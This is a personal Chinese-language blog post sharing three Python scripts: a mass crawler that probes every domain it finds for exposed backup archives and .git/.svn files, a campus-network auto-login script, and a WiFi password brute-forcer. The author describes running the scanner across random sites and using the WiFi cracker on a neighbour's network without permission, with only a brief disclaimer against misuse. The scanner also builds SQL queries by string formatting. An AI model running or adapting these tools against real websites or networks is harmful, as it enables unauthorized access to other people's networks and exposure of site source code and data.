>我真的太惨了

>外出实习忘记了博客密码

>断更了这么久

>今天终于忍不了了,ssh连上来黑了自己的首页,试图记录点什么

>2019/08/21 --C0d3r1iu

自己写的垃圾堆 – 记录日 – C0d3r1iu's Blog

自己写的垃圾堆

互联网,证明我来过。

贴一些小脚本:

 
ps:都是些垃圾,千万不要拿这些去破坏任何服务,脏手且入迷途
 

1.单线程简易版扫备份

intro : 这是寒假无聊写着玩的,挂了几天扫了不少,提交补天混一波零食~

Usage : 给website设定一个外链比较多的初始站点,配置好数据库,就可以自动爬取

Todo :

  1. 改成多线程或者其他IO,实现分发任务
  2. 持续优化、添加自适应备份文件名字典生成
#encoding = utf-8
"""

@Author: c0d3r1iu
@Email: admin@recorday.cn
@File: main.py
@Time: 2019/2/6 17:33
爬虫入口
"""

import requests,re,pymysql,traceback

website = 'http://www.2345.com'
mysql_ip = '127.0.0.1'
mysql_user = 'root'
mysql_pass = 'root'
mysql_dbname = 'webinfo'
url_list = [website]
db = ''
timer = 0

#  自适应备份文件名生成器
def get_check_url(url):
    rar = url.split('//')[1]
    domain = rar.split('.')[1]
    dic = [
        '.git/HEAD',
        '.svn/entries',
        '.DS_Store',
        '.svn/wc.db',
        'www.zip',
        'www.tar.gz',
        'www.rar',
        'wwwroot.zip',
        'wwwroot.tar.gz',
        'wwwroot.rar',
        '1.rar',
        '1.zip',
        'backup.rar',
        'backup.zip',
        'backupdata.rar',
        'backupdata.zip',
        rar + '.rar',
        rar + '.zip',
        rar + '.tar.gz',
        domain + '.rar',
        domain + '.zip',
        domain + '.tar.gz'
    ]
    for i in dic:
        yield url+'/'+i

#  检测文件头是否有效
def check(url):
    global db
    global timer
    headers = {'User-Agent': 'Mozilla/4.0(compatible;MSIE7.0;WindowsNT5.1;360SE)'}
    for item in get_check_url(url):
        try:
            print('[+] {} 正在探测...'.format(item))
            response = requests.get(item, headers=headers, timeout=5,stream=True)
            #response.encoding = response.apparent_encoding
            print(response.status_code)
            if response.status_code == 200 :
                cont = response.raw.read(1)
                print(cont)
                capt = response.headers['Content-Type']
                print(capt)
                    #if capt == b'Ra' or capt == b'PK' or capt!= b'x1fx8b' :
                if cont!=b'' and cont!=b'<' and 'application' in capt and 'json' not in capt:
                    data = {
                        'url': item
                    }
                    if Mysql_sec_insert(db,data):
                        print('[+] {} 探测成功,已经入库'.format(item))
                        timer += 1
        except Exception:
            print('[x] {} 探测失败'.format(item))
            traceback.print_exc()

#  正则匹配页面含有的所有域名
def Find_URL(text):
    global url_list
    a = re.findall(r'https?://w+.w+.?w+.?w+.?w+', text)
    tms = len(a)
    a = list(set(a))
    url_list += a
    url_list = list(set(url_list))
    print('[+] 此页面找到'+ str(tms) +'个URL')
    print('---------------------------------')

#  连接数据库
def Mysql_connect():

    db = pymysql.connect(mysql_ip, mysql_user, mysql_pass, mysql_dbname)
    return db

#  插入数据库
def Mysql_insert(db,info):

    cursor = db.cursor()
    try:
    #print('insert into webinfo(url,title,is_ok) values('{0}','{1}',{2})'.format(info['url'],info['title'],info['ok']))
        cursor.execute('insert into webinfo(url,title,is_ok) values('{0}','{1}',{2})'.format(info['url'],info['title'],info['ok']))
    except:
        print('[x] 插入异常,URL可能已存在')

def Mysql_sec_insert(db,info):

    cursor = db.cursor()
    try:
    #print('insert into webinfo(url,title,is_ok) values('{0}','{1}',{2})'.format(info['url'],info['title'],info['ok']))
        cursor.execute('insert into vulurl(url) values('{0}')'.format(info['url']))
    except:
        print('[x] 插入异常')

#  请求网页,收集信息
def Request_website(url):
    header= { 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'}

    info={'url':'','title':'','ok':1}
    info['url'] = url
    try:
        req = requests.get(url,timeout=5,headers=header)
        # title = re.findall('<title>.+</title>',req.text)
        # print(title)
        # if title:
        #     info['title'] = str(title).split('>')[1].split('<')[0]
        #     print(info['title'])
        # else:
        #     info['title'] = ' '
    except:
        # info['ok'] = 0
        # info['title'] = ' '
        print('[X] 页面访问失败')
        return 0
    Find_URL(req.text)
    print('[+] 页面访问成功,准备进行目录探测...')
    return 1

#  主控模块,负责任务分发
def controller():
    global timer
    global  url_list
    global db
    db = Mysql_connect()
    while(len(url_list)!=0):
        tmp_list = url_list
        print('[+] 本轮爬取任务:'+str(len(tmp_list))+' 个')
        for i in tmp_list:
            #try:
            print('[+] '+ i + ' 为下一个目标')
            req = Request_website(i)
            #如果网站可以访问呢,就入库
            if req == 1:
                print('[+] 有效探测次数:'+ str(timer))
                #Mysql_insert(db,req)
                check(i)
                url_list.remove(i)
                print('[-] 探测完毕,目标已去除')
                print('[o] 还剩'+str(len(url_list))+'个任务')
                print('++++++++++++++++++++++++++++++++++++++++')
            #except:
                #print('异常')
                #continue


if __name__ == "__main__":
    controller()

 

2.校园网断网识别+自动重连

intro : 实验室*台式机 or 服务器 24小时挂机必备辅助,主要应对校园网23点那一波全校范围断网,用来24小时PT站做种或者挂一些爬虫都是很OK的

Usage : SchWebDoctor.py 校园网账号 校园网密码

Todo : Nothing to do

"""

@Author: c0d3r1iu
@Email: admin@recorday.cn
@File: SchWebDoctor.py
@Time: 2018/3/15 20:06
校园网自动检测+连接
"""
import requests
import sys
import time

#  判断是否断网,按挂机需求修改秒数,一般为了夜间做种建议10秒一check
#  根据断网之后会自动跳转到登陆界面这一特性来判断是否断网

def checker():
    checker = requests.get('http://www.recorday.cn')
    if 'eportal/InterFace.do' in checker.text:
        params = checker.text.split('jsp?')[1].split(''</')[0]
        return params
    else:
        return False
if __name__ == "__main__":
    if len(sys.argv)== 3:
        username = sys.argv[1]
        password = sys.argv[2]
        url = 'http://172.26.156.158/eportal/InterFace.do?method=login'
        Login_Headers = {
            'Content-Type': 'application/x-www-form-urlencoded',
            'Host': '172.26.156.158',
            'Connection': 'Keep-Alive',
            'Accept-Encoding': 'gzip,deflate',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'
        }
        while True:
            params = checker()
            if params:
                Logn_Data = {
                     'userId' : username,
                     'password' : password,
                     'service' : '',
                     'queryString' : params,
                     'operatorPwd' : '',
                     'operatorUserId' : '',
                     'validcode' : ''
                     }
                requests.post(url,headers=Login_Headers,data=Logn_Data)
            else:
                time.sleep(900)
    else:
        print(
        '''
        You Input An Error Params
        Usage:SchWebDoctor.py username password
        '''
        )
        exit()

 

3 Wifi穷举

intro : 暑假去爷爷奶奶家没有wifi,拿邻居的wifi开干~

Usage : 需要设备打开无线上网功能,字典放到程序根目录命名为 password.txt 即可

Todo : 认证过程加速不了,无计可施 ~

"""

@Author: c0d3r1iu
@Email: admin@recorday.cn
@File: WifiCracker.py
@Time: 2018/7/20 16:23
Wifi密码穷举破解
"""

import pywifi
import sys
import time
from pywifi import const
wifi = pywifi.PyWiFi()
ifcase = wifi.interfaces()[0]
ifcase.disconnect()
# print(ifcase)
# time.sleep(1)
# if ifcase.status() in [const.IFACE_DISCONNECTED,const.IFACE_INACTIVE]:
#     print("ok")

# usage: wificracker.py wifiname
def crack(ssid):
    f = open('password.txt','r')
    while True:
        try:
            passline = f.readline()
            if not passline:
                break
            judge = gic(ssid,passline)
            if judge:
                print('ok,the password is : ',passline)
                break
            else:
                print('fail,password: ',passline)
            time.sleep(3)
        except:
            print('caution!!')
            continue

def gic(ssid,password):
    profile = pywifi.Profile()
    profile.ssid = ssid
    profile.auth = const.AUTH_ALG_OPEN
    profile.akm.append(const.AKM_TYPE_WPA2PSK)
    profile.cipher = const.CIPHER_TYPE_CCMP
    profile.key=password
    ifcase.remove_all_network_profiles()
    tmp_profile = ifcase.add_network_profile(profile)
    ifcase.connect(tmp_profile)
    time.sleep(5)
    if ifcase.status() == const.IFACE_CONNECTED:
        ifcase.disconnect()
        time.sleep(1)
        return True
    else:
        ifcase.disconnect()
        time.sleep(1)
        return False
crack(sys.argv[1])

Comments are closed.

顶部
护眼
搜索
分享